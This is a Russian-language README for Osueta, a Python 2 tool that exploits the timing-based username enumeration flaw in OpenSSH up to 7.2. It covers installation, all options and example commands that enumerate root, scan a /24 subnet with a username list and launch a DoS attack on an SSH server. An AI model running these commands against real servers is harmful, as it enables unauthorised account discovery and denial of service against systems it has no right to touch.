
Простой Python-скрипт для эксплуатации атаки перечисления пользователей OpenSSH на основе времени.
* ___ ___ ___ _ _ *
* / _ \ _ __ ___ _ _ / __/ __| || | *
* | (_) | '_ \/ -_) ' \\__ \__ \ __ | *
* \___/| .__/\___|_||_|___/___/_||_| *
* |_| *
* _ _ ___ _ _ *
* | | | |___ ___ _ _ | __|_ _ _ _ _ __ ___ _ _ __ _| |_(_)___ _ _ *
* | |_| (_-</ -_) '_| | _|| ' \ || | ' \/ -_) '_/ _` | _| / _ \ ' \ *
* \___//__/\___|_| |___|_||_\_,_|_|_|_\___|_| \__,_|\__|_\___/_||_| *
* *
* _____ _ _ _ _ _ _ *
* |_ _(_)_ __ (_)_ _ __ _ /_\| |_| |_ __ _ __| |__ *
* | | | | ' \| | ' \/ _` | / _ \ _| _/ _` / _| / / *
* |_| |_|_|_|_|_|_||_\__, | /_/ \_\__|\__\__,_\__|_\_\ *
* |___/ *
***************************************************************************
Osueta — это простой скрипт на Python2 для эксплуатации атаки по времени перечисления пользователей OpenSSH,
присутствующей в версиях OpenSSH <= 7.2 и >= 5.*. Скрипт имеет возможность создавать вариации
имени пользователя, используемого в атаке подбора, и возможность устанавливать
состояние DOS на сервере OpenSSH.
http://seclists.org/fulldisclosure/2013/Jul/88
Ошибка была исправлена в версии OpenSSH 7.3:
http://www.openssh.com/txt/release-7.3
c0r3dump3d | coredump<@>autistici.org
rofen | rofen<@>gmx.de
Мы хотим поблагодарить Хавьера Ньето из www.behindthefirewalls.com за его поддержку и помощь.
Как и другие инструменты для атак, авторы снимают с себя всю ответственность за использование этого скрипта.
Debian:
# apt-get install python-ipy python-nmap
# pip install paramiko
# pip install IPy
ArchLinux:
# pacman -S python2-ipy python2-nmap python2-paramiko
$ git clone https://github.com/c0r3dump3d/osueta.git
usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
[-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
[-c VERS] [--dos DOS] [-t THREADS]
Скрипт атаки по времени перечисления пользователей OpenSSH
необязательные аргументы:
-h, --help показать это справочное сообщение и выйти
-H HOST IP-адрес хоста или CIDR-подсеть.
-k HFILE Список хостов в файле.
-f FQDN FQDN для атаки.
-p PORT Порт хоста.
-L UFILE Файл со списком имён пользователей.
-U USER Использовать только одно имя пользователя.
-d DELAY Фиксированная задержка времени в секундах. Если не указано, задержка вычисляется.
-v VARI Создавать вариации имени пользователя (по умолчанию да).
-o OUTP Выходной файл с положительными результатами.
-l LENGTH Длина пароля в символах (x1000) (по умолчанию 40).
-c VERS Проверять или нет версию OpenSSH (по умолчанию да).
--dos DOS Попытка совершить DOS-атаку (по умолчанию нет).
-t THREADS Потоки для DOS-атаки (по умолчанию 5).
* Попытка перечисления одного пользователя с вариациями имени пользователя:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
* Попытка перечисления одного пользователя без вариаций и с DOS-атакой:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
* Сканирование сети класса C только с одним пользователем:
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
* Сканирование сети класса C с именами пользователей из файла, задержка 15 секунд и пароль длиной 50000 символов:
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50